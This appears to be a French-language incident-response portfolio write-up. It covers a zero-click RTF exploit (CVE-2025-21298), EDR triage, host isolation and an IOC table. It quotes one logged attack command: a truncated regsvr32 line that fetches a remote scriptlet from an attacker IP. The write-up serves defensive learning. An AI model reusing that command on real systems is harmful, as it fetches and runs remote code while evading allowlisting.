
Investigation technique et confinement d'hôte d'une exploitation RCE zero-click de sévérité Critique (CVE-2025-21298) utilisant la télémétrie EDR et l'analyse statique de logiciels malveillants.
Ce projet documente l'enquête et le confinement de bout en bout d'une tentative d'exécution de code à distance (RCE) Zero-Click de sévérité Critique. En utilisant la télémétrie EDR et le renseignement sur les menaces, j'ai identifié une attaque "Living off the Land" (LotL) qui a contourné les défenses automatisées et établi une communication de commande et contrôle (C2).
J'ai identifié l'ID d'événement 314 : Détection de RCE Zero-Click Windows OLE. La télémétrie initiale a révélé que le fichier malveillant mail.rtf était par les défenses périmétriques, indiquant une compromission active sur le poste de travail 'Austin'.

J'ai effectué une vérification de la réputation du hachage du fichier sur VirusTotal. Les résultats ont confirmé un taux de détection de 25/55, identifiant spécifiquement le fichier comme un RTF militarisé utilisant CVE-2025-21298. Cette vulnérabilité permet l'exécution de code à distance via le volet d'aperçu de Windows sans interaction de l'utilisateur.

Je me suis tourné vers l'historique du terminal EDR pour l'hôte 'Austin' afin d'identifier le comportement post-exploitation. J'ai découvert une exécution malveillante "Living off the Land" (LotL) :
regsvr32.exe /s /u /i:http://84.38.130.118/...regsvr32.exe) pour récupérer un script-let malveillant d'un serveur distant, contournant la liste blanche des applications standard et les signatures AV traditionnelles.

Suivant le Cadre de réponse aux incidents NIST, le confinement immédiat a été priorisé. J'ai exécuté un isolement réseau sur l'hôte affecté pour mettre fin à la communication C2 et empêcher le mouvement latéral au sein du réseau d'entreprise.

L'incident a été clos en tant que Vrai Positif. J'ai documenté l'adresse IP de l'attaquant (84.38.130.118) et les preuves forensiques pour les équipes de renseignement sur les menaces et de pare-feu afin d'éviter de futures occurrences.

| Type | Valeur |
|---|---|
| Adresse IP C2 | 84.38.130.118 |
| Hachage du fichier (SHA256) | df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 |
| Vulnérabilité | CVE-2025-21298 |
| MITRE ATT&CK | T1218.010 - Exécution de proxy binaire signé : Regsvr32 |